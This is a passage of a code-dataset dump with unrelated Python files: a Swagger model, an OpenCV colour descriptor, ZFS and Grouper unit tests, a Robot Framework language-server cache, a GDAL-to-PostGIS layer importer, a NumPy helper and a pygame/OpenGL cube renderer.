iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n if self is None:\n return None\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n if self is None or other is None:\n return None\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n\n","sub_path":"netapp/santricity/models/symbol/pit_consistency_group_view_creation_descriptor.py","file_name":"pit_consistency_group_view_creation_descriptor.py","file_ext":"py","file_size_in_byte":8287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"238859748","text":"# import the necessary packages\nimport numpy as np\nimport cv2\n\n\nclass ColorDescriptor:\n def __init__(self, bins):\n # store the number of bins for the 3D histogram\n self.bins = bins\n\n def describe(self, image):\n # convert the image to the HSV color space and initialize\n # the features used to quantify the image\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n features = []\n\n # grab the dimensions and compute the center of the image\n (h, w) = image.shape[:2]\n (cX, cY) = (int(w * 0.5), int(h * 0.5))\n\n\n # construct an elliptical mask representing the center of the\n # image\n (axesX, axesY) = ((int)((w * 0.75) / 2), (int)((h * 0.75) / 2))\n ellipMask = np.zeros(image.shape[:2], dtype=\"uint8\")\n cv2.ellipse(ellipMask, (cX, cY), (axesX, axesY), 0.0, 0.0, 360.0, 255, -1)\n\n\n # extract a color histogram from the elliptical region and\n # update the feature vector\n hist = self.histogram(image, ellipMask)\n features.extend(hist)\n\n # return the feature vector\n return features\n\n def histogram(self, image, mask):\n # extract a 3D color histogram from the masked region of the\n # image, using the supplied number of bins per channel; then\n # normalize the histogram\n hist = cv2.calcHist([image], [0, 1, 2], mask, self.bins,\n [0, 180, 0, 256, 0, 256])\n hist = cv2.normalize(hist,hist).flatten()\n\n # return the histogram\n return hist","sub_path":"app/descriptor/colordescriptor.py","file_name":"colordescriptor.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112697662","text":"# Copyright (c) 2017-2019, Stefan Grönke\n# Copyright (c) 2014-2018, iocage\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted providing that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING\n# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\"\"\"Unit tests for Datasets.\"\"\"\nimport pytest\nimport typing\nimport libzfs\n\nimport libioc.lib\n\n\nclass DatasetsMock(libioc.Datasets.Datasets):\n \"\"\"Mock the database.\"\"\"\n\n ZFS_POOL_ACTIVE_PROPERTY = \"org.freebsd.ioc-test:active\"\n\n\nclass TestDatasets(object):\n \"\"\"Run Datasets unit tests.\"\"\"\n\n @pytest.fixture\n def MockedDatasets(\n self,\n logger: 'libioc.Logger.Logger',\n pool: libzfs.ZFSPool\n ) -> typing.Generator[DatasetsMock, None, None]:\n \"\"\"Mock a dataset in a disabled pool.\"\"\"\n yield DatasetsMock # noqa: T484\n\n prop = DatasetsMock.ZFS_POOL_ACTIVE_PROPERTY\n pool.root_dataset.properties[prop].value = \"no\"\n\n def test_pool_can_be_activated(\n self,\n MockedDatasets: typing.Generator[DatasetsMock, None, None],\n pool: libzfs.ZFSPool,\n logger: 'libioc.Logger.Logger'\n ) -> None:\n \"\"\"Test if a pool can be activated.\"\"\"\n datasets = DatasetsMock(pool=pool, logger=logger)\n datasets.deactivate()\n datasets.activate(mountpoint=\"/iocage-test\")\n","sub_path":"tests/test_Datasets.py","file_name":"test_Datasets.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46125625","text":"from operator import itemgetter\r\nimport unittest\r\n\r\nfrom grouper import Grouper\r\n\r\n\r\nclass GrouperTests(unittest.TestCase):\r\n\r\n \"\"\"Tests for Grouper.\"\"\"\r\n\r\n def test_test_tuples_of_strings(self):\r\n animals = [\r\n ('agatha', 'dog'),\r\n ('kurt', 'cat'),\r\n ('margaret', 'mouse'),\r\n ('cory', 'cat'),\r\n ('mary', 'mouse'),\r\n ]\r\n animals_by_type = {\r\n 'mouse': [('margaret', 'mouse'), ('mary', 'mouse')],\r\n 'dog': [('agatha', 'dog')],\r\n 'cat': [('kurt', 'cat'), ('cory', 'cat')],\r\n }\r\n groups = Grouper(animals, key=itemgetter(1))\r\n self.assertEqual(dict(groups), animals_by_type)\r\n\r\n def test_no_iterable_given(self):\r\n groups = Grouper(key=str.lower)\r\n self.assertEqual(dict(groups), {})\r\n\r\n def test_strings(self):\r\n words = [\"Apple\", \"animal\", \"apple\", \"ANIMAL\", \"animal\"]\r\n word_groups = {\r\n \"apple\": [\"Apple\", \"apple\"],\r\n \"animal\": [\"animal\", \"ANIMAL\", \"animal\"],\r\n }\r\n groups = Grouper(words, key=str.lower)\r\n self.assertEqual(dict(groups), word_groups)\r\n\r\n def test_containment(self):\r\n words = [\"Apple\", \"animal\", \"apple\", \"ANIMAL\", \"animal\"]\r\n groups = Grouper(words, key=str.lower)\r\n self.assertIn('apple', groups)\r\n\r\n def test_lookups(self):\r\n words = [\"Apple\", \"animal\", \"apple\", \"ANIMAL\", \"animal\"]\r\n groups = Grouper(words, key=str.lower)\r\n self.assertEqual(groups['apple'], [\"Apple\", \"apple\"])\r\n\r\n def test_init_accepts_mapping(self):\r\n dictionary = {\r\n \"apple\": [\"Apple\", \"apple\"],\r\n \"lemon\": [\"lemon\"],\r\n }\r\n groups = Grouper(dictionary, key=str.lower)\r\n self.assertEqual(dict(groups), dictionary)\r\n\r\n # To test the Bonus part of this exercise, comment out the following line\r\n # @unittest.expectedFailure\r\n def test_custom_update_method(self):\r\n words = [\"Apple\", \"animal\", \"apple\", \"ANIMAL\", \"animal\"]\r\n word_groups = {\r\n \"apple\": [\"Apple\", \"apple\", \"APPLE\", \"APPLE\"],\r\n \"animal\": [\"animal\", \"ANIMAL\", \"animal\"],\r\n \"lemon\": [\"lemon\", \"Lemon\", \"lemon\", \"LEMON\"],\r\n \"orange\": [\"Orange\"],\r\n }\r\n more_items = {\r\n \"apple\": [\"APPLE\"],\r\n \"lemon\": [\"lemon\", \"LEMON\"],\r\n \"orange\": [\"Orange\"],\r\n }\r\n groups = Grouper(words, key=str.lower)\r\n groups.update([\"lemon\", \"Lemon\", \"APPLE\"])\r\n groups.update(more_items)\r\n self.assertEqual(dict(groups), word_groups)\r\n\r\n # To test the Bonus part of this exercise, comment out the following line\r\n # @unittest.expectedFailure\r\n def test_add_and_group_for_methods(self):\r\n names = [\"Trey Hunner\", \"Monica Marshall\", \"Katherine Hunner\"]\r\n def last_name(name): return name.rsplit()[-1]\r\n name_groups = Grouper(names, key=last_name)\r\n self.assertEqual(name_groups.group_for(\"Rose Hunner\"), \"Hunner\")\r\n self.assertEqual(name_groups.group_for(\"Rose Klyce\"), \"Klyce\")\r\n self.assertEqual(\r\n name_groups['Hunner'],\r\n [\"Trey Hunner\", \"Katherine Hunner\"],\r\n )\r\n name_groups.add('Rose Hunner')\r\n self.assertEqual(\r\n name_groups['Hunner'],\r\n [\"Trey Hunner\", \"Katherine Hunner\", \"Rose Hunner\"],\r\n )\r\n name_groups.add(\"Rose Klyce\")\r\n self.assertEqual(name_groups['Klyce'], [\"Rose Klyce\"])\r\n\r\n # To test the Bonus part of this exercise, comment out the following line\r\n # @unittest.expectedFailure\r\n def test_adding_grouper_objects_together(self):\r\n words1 = [\"apple\", \"animal\", \"lemon\", \"ANIMAL\", \"Apple\"]\r\n words2 = [\"Lemon\", \"Animal\", \"Apple\", \"lemon\"]\r\n word_groups = {\r\n \"apple\": [\"apple\", \"Apple\", \"Apple\"],\r\n \"animal\": [\"animal\", \"ANIMAL\", \"Animal\"],\r\n \"lemon\": [\"lemon\", \"Lemon\", \"lemon\"],\r\n }\r\n groups1 = Grouper(words1, key=str.lower)\r\n groups2 = Grouper(words2, key=str.lower)\r\n self.assertEqual(dict(groups1 + groups2), word_groups)\r\n groups3 = Grouper(words2, key=str.upper)\r\n with self.assertRaises(ValueError):\r\n groups1 + groups3 # Can't concatenate groups with different keys\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main(verbosity=2)\r\n","sub_path":"morsels/20200316_grouper/test_grouper.py","file_name":"test_grouper.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"316604672","text":"from __future__ import annotations\n\nimport ast\nimport asyncio\nimport enum\nimport io\nimport weakref\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n Generator,\n Iterable,\n List,\n Optional,\n cast,\n)\n\nfrom ....utils.async_event import CancelationToken, async_tasking_event\nfrom ....utils.uri import Uri\nfrom ...common.parts.workspace import WorkspaceFolder\nfrom ...common.text_document import TextDocument\nfrom ..configuration import RobotConfig\nfrom ..diagnostics.imports_manager import ImportsManager\nfrom ..diagnostics.namespace import Namespace\nfrom ..utils.ast import Token\n\nif TYPE_CHECKING:\n from ..protocol import RobotLanguageServerProtocol\n\nfrom .protocol_part import RobotLanguageServerProtocolPart\n\n\nclass UnknownFileTypeError(Exception):\n pass\n\n\nclass DocumentType(enum.Enum):\n UNKNOWN = \"unknown\"\n GENERAL = \"robot\"\n RESOURCE = \"resource\"\n INIT = \"init\"\n\n\nclass DocumentsCache(RobotLanguageServerProtocolPart):\n def __init__(self, parent: RobotLanguageServerProtocol) -> None:\n super().__init__(parent)\n self._loop = asyncio.get_event_loop()\n\n self._imports_managers_lock = asyncio.Lock()\n self._imports_managers: weakref.WeakKeyDictionary[WorkspaceFolder, ImportsManager] = weakref.WeakKeyDictionary()\n self._default_imports_manager: Optional[ImportsManager] = None\n\n async def get_document_type(self, document: TextDocument) -> DocumentType:\n return await document.get_cache(self.__get_document_type)\n\n async def __get_document_type(self, document: TextDocument) -> DocumentType:\n path = document.uri.to_path()\n suffix = path.suffix.lower()\n\n if path.name == \"__init__.robot\":\n return DocumentType.INIT\n elif suffix == \".robot\":\n return DocumentType.GENERAL\n elif suffix == \".resource\":\n return DocumentType.RESOURCE\n else:\n return DocumentType.UNKNOWN\n\n async def get_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n return await document.get_cache(self.__get_tokens, cancelation_token)\n\n async def __get_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n document_type = await self.get_document_type(document)\n if document_type == DocumentType.INIT:\n return await self.get_init_tokens(document, cancelation_token)\n elif document_type == DocumentType.GENERAL:\n return await self.get_general_tokens(document, cancelation_token)\n elif document_type == DocumentType.RESOURCE:\n return await self.get_resource_tokens(document, cancelation_token)\n else:\n raise UnknownFileTypeError(str(document.uri))\n\n async def get_general_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n return await document.get_cache(self.__get_general_tokens, cancelation_token)\n\n async def __get_general_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n import robot.api\n\n def get(text: str, cancelation_token: CancelationToken) -> List[Token]:\n with io.StringIO(text) as content:\n return [e for e in robot.api.get_tokens(content) if not cancelation_token.throw_if_canceled()]\n\n return await self.__get_tokens_internal(document, get, cancelation_token)\n\n async def __get_tokens_internal(\n self,\n document: TextDocument,\n get: Callable[[str, CancelationToken], List[Token]],\n cancelation_token: Optional[CancelationToken] = None,\n ) -> List[Token]:\n try:\n if cancelation_token is None:\n cancelation_token = CancelationToken()\n return await asyncio.get_event_loop().run_in_executor(None, get, document.text, cancelation_token)\n except asyncio.CancelledError:\n if cancelation_token is not None:\n cancelation_token.cancel()\n raise\n\n async def get_resource_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n return await document.get_cache(self.__get_resource_tokens, cancelation_token)\n\n async def __get_resource_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n import robot.api\n\n def get(text: str, cancelation_token: CancelationToken) -> List[Token]:\n with io.StringIO(text) as content:\n return [e for e in robot.api.get_resource_tokens(content) if not cancelation_token.throw_if_canceled()]\n\n return await self.__get_tokens_internal(document, get, cancelation_token)\n\n async def get_init_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n return await document.get_cache(self.__get_init_tokens, cancelation_token)\n\n async def __get_init_tokens(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> List[Token]:\n import robot.api\n\n def get(text: str, cancelation_token: CancelationToken) -> List[Token]:\n with io.StringIO(text) as content:\n return [e for e in robot.api.get_init_tokens(content) if not cancelation_token.throw_if_canceled()]\n\n return await self.__get_tokens_internal(document, get, cancelation_token)\n\n async def get_model(self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None) -> ast.AST:\n document_type = await self.get_document_type(document)\n\n if document_type == DocumentType.INIT:\n return await self.get_init_model(document, cancelation_token)\n if document_type == DocumentType.GENERAL:\n return await self.get_general_model(document, cancelation_token)\n if document_type == DocumentType.RESOURCE:\n return await self.get_resource_model(document, cancelation_token)\n else:\n raise UnknownFileTypeError(f\"Unknown file type '{document.uri}'.\")\n\n async def __get_model(\n self,\n document: TextDocument,\n tokens: Iterable[Any],\n document_type: DocumentType,\n cancelation_token: Optional[CancelationToken] = None,\n ) -> ast.AST:\n from robot.parsing.lexer import Token\n from robot.parsing.parser.parser import _get_model\n\n if cancelation_token is not None:\n cancelation_token = CancelationToken()\n\n def get_tokens(_source: str, _data_only: bool = False) -> Generator[Token, None, None]:\n for t in tokens:\n if cancelation_token is not None:\n cancelation_token.throw_if_canceled()\n yield t\n\n try:\n model = await asyncio.get_event_loop().run_in_executor(None, _get_model, get_tokens, document.uri.to_path())\n except asyncio.CancelledError:\n if cancelation_token is not None:\n cancelation_token.cancel()\n raise\n\n setattr(model, \"source\", str(document.uri.to_path()))\n setattr(model, \"model_type\", document_type)\n\n return cast(ast.AST, model)\n\n async def get_general_model(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> ast.AST:\n return await document.get_cache(self.__get_general_model, cancelation_token)\n\n async def __get_general_model(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> ast.AST:\n return await self.__get_model(\n document, await self.get_general_tokens(document), DocumentType.GENERAL, cancelation_token\n )\n\n async def get_resource_model(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> ast.AST:\n return await document.get_cache(self.__get_resource_model, cancelation_token)\n\n async def __get_resource_model(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> ast.AST:\n return await self.__get_model(\n document, await self.get_resource_tokens(document), DocumentType.RESOURCE, cancelation_token\n )\n\n async def get_init_model(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> ast.AST:\n return await document.get_cache(self.__get_init_model, cancelation_token)\n\n async def __get_init_model(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> ast.AST:\n return await self.__get_model(\n document, await self.get_init_tokens(document), DocumentType.INIT, cancelation_token\n )\n\n async def get_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await document.get_cache(self.__get_namespace, cancelation_token)\n\n async def __get_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await self.__get_namespace_for_document_type(document, None, cancelation_token)\n\n async def get_resource_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await document.get_cache(self.__get_resource_namespace, cancelation_token)\n\n async def __get_resource_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await self.__get_namespace_for_document_type(document, DocumentType.RESOURCE, cancelation_token)\n\n async def get_init_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await document.get_cache(self.__get_init_namespace, cancelation_token)\n\n async def __get_init_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await self.__get_namespace_for_document_type(document, DocumentType.INIT, cancelation_token)\n\n async def get_general_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await document.get_cache(self.__get_general_namespace, cancelation_token)\n\n async def __get_general_namespace(\n self, document: TextDocument, cancelation_token: Optional[CancelationToken] = None\n ) -> Namespace:\n return await self.__get_namespace_for_document_type(document, DocumentType.GENERAL, cancelation_token)\n\n @async_tasking_event\n async def namespace_invalidated(sender, document: TextDocument) -> None:\n ...\n\n async def __invalidate_namespace(self, namespace: Namespace) -> None:\n document = namespace.document\n if document is not None:\n await document.remove_cache_entry(self.__get_namespace)\n await self.namespace_invalidated(self, document)\n\n async def __get_namespace_for_document_type(\n self,\n document: TextDocument,\n document_type: Optional[DocumentType],\n cancelation_token: Optional[CancelationToken] = None,\n ) -> Namespace:\n if document_type is not None and document_type == DocumentType.INIT:\n model = await self.get_init_model(document, cancelation_token)\n elif document_type is not None and document_type == DocumentType.RESOURCE:\n model = await self.get_resource_model(document, cancelation_token)\n elif document_type is not None and document_type == DocumentType.GENERAL:\n model = await self.get_general_model(document, cancelation_token)\n else:\n model = await self.get_model(document, cancelation_token)\n\n imports_manager = await self.get_imports_manager(document)\n\n def invalidate(namespace: Namespace) -> None:\n if self._loop.is_running():\n asyncio.create_task(self.__invalidate_namespace(namespace))\n\n return Namespace(imports_manager, model, str(document.uri.to_path()), invalidate, document)\n\n @property\n def default_imports_manager(self) -> ImportsManager:\n if self._default_imports_manager is None:\n self._default_imports_manager = ImportsManager(\n self.parent,\n Uri(self.parent.workspace.root_uri or \".\"),\n RobotConfig(args=(), python_path=[], env={}, variables={}),\n )\n return self._default_imports_manager\n\n async def get_imports_manager(self, document: TextDocument) -> ImportsManager:\n folder = self.parent.workspace.get_workspace_folder(document.uri)\n if folder is None:\n return self.default_imports_manager\n\n async with self._imports_managers_lock:\n if folder not in self._imports_managers:\n config = await self.parent.workspace.get_configuration(RobotConfig, folder.uri)\n\n self._imports_managers[folder] = ImportsManager(self.parent, folder.uri, config)\n return self._imports_managers[folder]\n","sub_path":"robotcode/language_server/robotframework/parts/documents_cache.py","file_name":"documents_cache.py","file_ext":"py","file_size_in_byte":13409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244742936","text":"import os\nimport ogr\nimport osr\nimport gdal\nfrom .inspectors import GDALInspector, OGRInspector\nfrom .utils import FileTypeNotAllowed, GdalErrorHandler, load_handler, launder, increment\nfrom .handlers import IMPORT_HANDLERS\nfrom django import db\n\nogr.UseExceptions()\n\n\nclass Import(object):\n _import_handlers = []\n handler_results = []\n file_extensions = ['shp', 'zip']\n\n def filter_handler_results(self, handler_name):\n return filter(lambda results: handler_name in results.keys(), self.handler_results)\n\n def _initialize_handlers(self):\n self._import_handlers = [load_handler(handler, self)\n for handler in IMPORT_HANDLERS]\n\n @property\n def import_handlers(self):\n \"\"\"\n Initializes handlers and/or returns them.\n \"\"\"\n if not self._import_handlers:\n self._initialize_handlers()\n\n return self._import_handlers\n\n def import_file(self, filename, **kwargs):\n raise NotImplementedError\n\n def file_extension_not_allowed(self, request, *args, **kwargs):\n raise FileTypeNotAllowed\n\n def handle(self, configuration_options, *args, **kwargs):\n \"\"\"\n Executes the entire import process.\n 1) Imports the dataset from the source dataset to the target.\n 2) Executes arbitrary handlers that can modify the data set.\n 3) Executes arbitrary publish handlers to publish the data set.\n \"\"\"\n\n layers = self.import_file(configuration_options=configuration_options)\n\n for layer, config in layers:\n config['handler_results'] = self.run_import_handlers(layer, config)\n\n return layers\n\n def run_import_handlers(self, layer, layer_config, *args, **kwargs):\n \"\"\"\n Handlers that are run on each layer of a data set.\n \"\"\"\n self.handler_results = []\n\n for handler in self.import_handlers:\n self.handler_results.append({type(handler).__name__ : handler.handle(layer, layer_config, *args, **kwargs)})\n\n return self.handler_results\n\n\nclass GDALImport(Import):\n\n source_inspectors = [GDALInspector]\n target_inspectors = [OGRInspector]\n\n def __init__(self, filename, target_store=None):\n self.file = filename\n self.completed_layers = []\n\n if target_store is None:\n d = db.connections['datastore'].settings_dict\n connection_string = \"PG:dbname='%s' user='%s' password='%s' host='%s' port='%s'\" % (d['NAME'], d['USER'],\n d['PASSWORD'],\n d['HOST'], d['PORT'])\n self.target_store = connection_string\n\n def open_datastore(self, connection_string, inspectors, *args, **kwargs):\n \"\"\"\n Opens the source source data set using GDAL.\n \"\"\"\n\n for inspector in inspectors:\n data = inspector(connection_string, *args, **kwargs).open()\n if data is not None:\n return data\n\n def open_source_datastore(self, connection_string, *args, **kwargs):\n \"\"\"\n Opens the source source data set using GDAL.\n \"\"\"\n\n return self.open_datastore(connection_string, self.source_inspectors, *args, **kwargs)\n\n def open_target_datastore(self, connection_string, *args, **kwargs):\n \"\"\"\n Opens the target data set using OGR.\n \"\"\"\n\n return self.open_datastore(connection_string, self.target_inspectors, *args, **kwargs)\n\n def create_target_dataset(self, target_datastore, layer_name, *args, **kwargs):\n \"\"\"\n Creates the data source in the target data store.\n \"\"\"\n return target_datastore.CreateLayer(layer_name, *args, **kwargs)\n\n def get_layer_type(self, layer, source):\n \"\"\"\n A hook for returning the GeometryType of a layer.\n\n This is work around for a limitation of the Shapefile: when reading a Shapefile of type\n SHPT_ARC, the corresponding layer will be reported as of type wkbLineString, but depending on the number\n of parts of each geometry, the actual type of the geometry for each feature can be either OGRLineString\n or OGRMultiLineString. The same applies for SHPT_POLYGON shapefiles, reported as layers of type wkbPolygon,\n but depending on the number of parts of each geometry, the actual type can be either OGRPolygon or\n OGRMultiPolygon.\n \"\"\"\n if source.GetDriver().ShortName == 'ESRI Shapefile':\n geom_type = layer.GetGeomType()\n\n # If point return MultiPoint\n if geom_type == 1:\n return 4\n\n # If LineString return MultiLineString\n if geom_type == 2:\n return 5\n\n # if Polygon return MutliPolygon\n if geom_type == 3:\n return 6\n\n return layer.GetGeomType()\n\n def import_file(self, *args, **kwargs):\n \"\"\"\n Loads data that has been uploaded into whatever format we need for serving.\n \"\"\"\n filename = self.file\n self.completed_layers = []\n err = GdalErrorHandler()\n gdal.PushErrorHandler(err.handler)\n configuration_options = kwargs.get('configuration_options', [{'index': 0}])\n\n # Configuration options should be a list at this point since the importer can process multiple layers in a\n # single import\n if isinstance(configuration_options, dict):\n configuration_options = [configuration_options]\n\n data = self.open_source_datastore(filename, *args, **kwargs)\n target_file = self.open_target_datastore(self.target_store)\n\n target_create_options = []\n\n # Prevent numeric field overflow for shapefiles https://trac.osgeo.org/gdal/ticket/5241\n if target_file.GetDriver().GetName() == 'PostgreSQL':\n target_create_options.append('PRECISION=NO')\n\n for layer_options in configuration_options:\n layer = data.GetLayer(layer_options.get('index'))\n layer_name = layer_options.get('name', layer.GetName().lower())\n layer_type = self.get_layer_type(layer, data)\n srs = layer.GetSpatialRef()\n\n if layer_name == 'ogrgeojson':\n try:\n layer_name = os.path.splitext(os.path.basename(filename))[0].lower()\n except IndexError:\n pass\n\n layer_name = launder(str(layer_name))\n\n # default the layer to 4326 if a spatial reference is not provided\n if not srs:\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n\n n = 0\n while True:\n n += 1\n try:\n target_layer = self.create_target_dataset(target_file, layer_name, srs,\n layer_type, options=target_create_options)\n except RuntimeError as e:\n # the layer already exists in the target store, increment the name\n if 'Use the layer creation option OVERWRITE=YES to replace it.' in e.message:\n layer_name = increment(layer_name)\n\n # try 100 times to increment then break\n if n >= 100:\n break\n\n continue\n else:\n raise e\n break\n\n # adding fields to new layer\n layer_definition = ogr.Feature(layer.GetLayerDefn())\n\n for i in range(layer_definition.GetFieldCount()):\n target_layer.CreateField(layer_definition.GetFieldDefnRef(i))\n\n for i in range(0, layer.GetFeatureCount()):\n feature = layer.GetFeature(i)\n\n if feature:\n if feature.geometry().GetGeometryType() != target_layer.GetGeomType() and \\\n target_layer.GetGeomType() in range(4, 7):\n\n conversion_function = ogr.ForceToMultiPolygon\n\n if target_layer.GetGeomType() == 5:\n conversion_function = ogr.ForceToMultiLineString\n\n elif target_layer.GetGeomType() == 4:\n conversion_function = ogr.ForceToMultiPoint\n\n geom = ogr.CreateGeometryFromWkb(feature.geometry().ExportToWkb())\n feature.SetGeometry(conversion_function(geom))\n target_layer.CreateFeature(feature)\n\n self.completed_layers.append([target_layer.GetName(), layer_options])\n\n return self.completed_layers\n","sub_path":"mapstory/importer/importers.py","file_name":"importers.py","file_ext":"py","file_size_in_byte":8790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"22301284","text":"import math\nimport numpy as np\n\n\ndef normal_d(size = 20, k = 0.95):\n \"\"\"\n Returns normal distribution NumPy array.\n \"\"\"\n\n default_size = 15.\n f_size = float(size)\n\n x = np.linspace(int(-size / 2), int(size / 2), size)\n\n # Calculate ND\n u = 0\n m = default_size / f_size\n q = np.sqrt(5.)\n\n return (k * 6 / (q * np.sqrt(2 * math.pi))) * np.power(math.e, -0.5 * ((x * m - u)/q)**2)\n\n\ndef insert_np(n_array, target, start = 0):\n \"\"\"\n Inserts NumPy 1d array into target 1d array from starting position, treats out of bounds correctly.\n \"\"\"\n if start > target.shape[0]:\n return\n\n # Target start/end\n start_t = start\n end_t = start + n_array.shape[0]\n\n start_i = 0\n if start < 0:\n start_i = -start\n start_t = 0\n\n if start_i > n_array.shape[0]:\n return\n\n end_i = n_array.shape[0]\n if end_t > target.shape[0]:\n end_i = n_array.shape[0] - (end_t - target.shape[0])\n end_t = target.shape[0]\n\n if end_i <= 0:\n return\n\n target[start_t : end_t] = n_array[start_i : end_i]\n\n return target\n","sub_path":"utils/math_helper.py","file_name":"math_helper.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"633874736","text":"import contextlib\r\nwith contextlib.redirect_stdout(None):\r\n import pygame, sys\r\nfrom pygame.locals import *\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\n\r\nclock = pygame.time.Clock()\r\nwidth, height = 1280, 720\r\npygame.init()\r\npygame.display.set_mode([width, height], DOUBLEBUF|OPENGL)\r\ngluPerspective(75, width/height, 0, 1000)\r\n\r\nedges = ((0,1),(0,3),(0,4),(2,1),(2,3),(2,7),(6,3),(6,4),(6,7),(5,1),(5,4),(5,7))\r\nsurfaces = ((0,1,2,3),(3,2,7,6),(6,7,5,4),(4,5,1,0),(1,5,7,2),(4,0,3,6))\r\nverticies=((1, 0, 0), (1, 1, 0), (0, 1, 0), (0, 0, 0), (1, 0, 1), (1, 1, 1), (0, 0, 1), (0, 1, 1))\r\nground_vertices=((-50,-0.1,50),(-50,-0.1,-50),(50,-0.1,-50),(50,-0.1,50),)\r\nsky_surfaces = ((0,1,2,3),(3,2,7,6),(6,7,5,4),(4,5,1,0),(1,5,7,2),(4,0,3,6))\r\n\r\nlook_up, look_down, look_left, look_right = False, False, False, False\r\npitch, yaw = 0, 0\r\n\r\ngrass = (0.21,0.41,0.18)\r\nsky = (0.22, 0.69, 87)\r\n\r\nclass Cube:\r\n def __init__(self, position, verticies, interactable = False, colour = (160, 0, 240)):\r\n self.position = position\r\n self.verticies = verticies\r\n self.interactable = interactable\r\n self.colour = colour\r\n def wireframe(self):\r\n glBegin(GL_LINES)\r\n offset = 0.5\r\n for edge in edges:\r\n for vertex in edge:\r\n glColor3fv(self.colour)\r\n glVertex3fv((self.position[0] - self.verticies[vertex][0] + offset, self.position[1] - self.verticies[vertex][1] + offset, self.position[2] - self.verticies[vertex][2] + offset))\r\n glEnd()\r\n def draw(self):\r\n glBegin(GL_QUADS)\r\n offset = 0.5\r\n for surface in surfaces:\r\n for vertex in surface:\r\n glColor3fv(self.colour)\r\n 